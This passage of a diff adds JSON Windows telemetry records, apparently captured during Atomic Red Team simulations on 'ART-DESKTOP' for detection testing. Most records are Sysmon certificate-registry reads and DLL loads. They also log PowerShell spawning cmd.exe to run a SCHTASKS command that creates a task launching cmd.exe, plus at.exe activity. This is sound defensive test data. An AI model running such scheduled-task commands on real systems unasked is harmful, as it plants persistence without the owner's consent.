"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msv1_0.dll", + "image_path": "C:\\Windows\\System32\\msv1_0.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803860000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "NtlmShared.dll", + "image_path": "C:\\Windows\\System32\\NtlmShared.dll", + "pid": 5964, + "process_name": "at.exe", + "process_path": "C:\\Windows\\System32\\at.exe", + "timestamp": 131883573803860000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6764, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573804120000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804009984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804170000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804170000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804170000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" + }, + { + "event_type": "file", + "file_name": "AT.EXE-E3131BD4.pf", + "file_path": "C:\\Windows\\Prefetch\\AT.EXE-E3131BD4.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573804170000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 6764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573804170000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1776, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573804750000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1776, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804640000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1776, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804640000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1776, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804640000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1776, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804640000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1776, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573804790000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" + }, + { + "command_line": "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6308, + "ppid": 1776, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "subtype": "create", + "timestamp": 131883573804840000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}", + "unique_ppid": "{42FC7E13-CC04-5C05-0000-001048EB5601}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 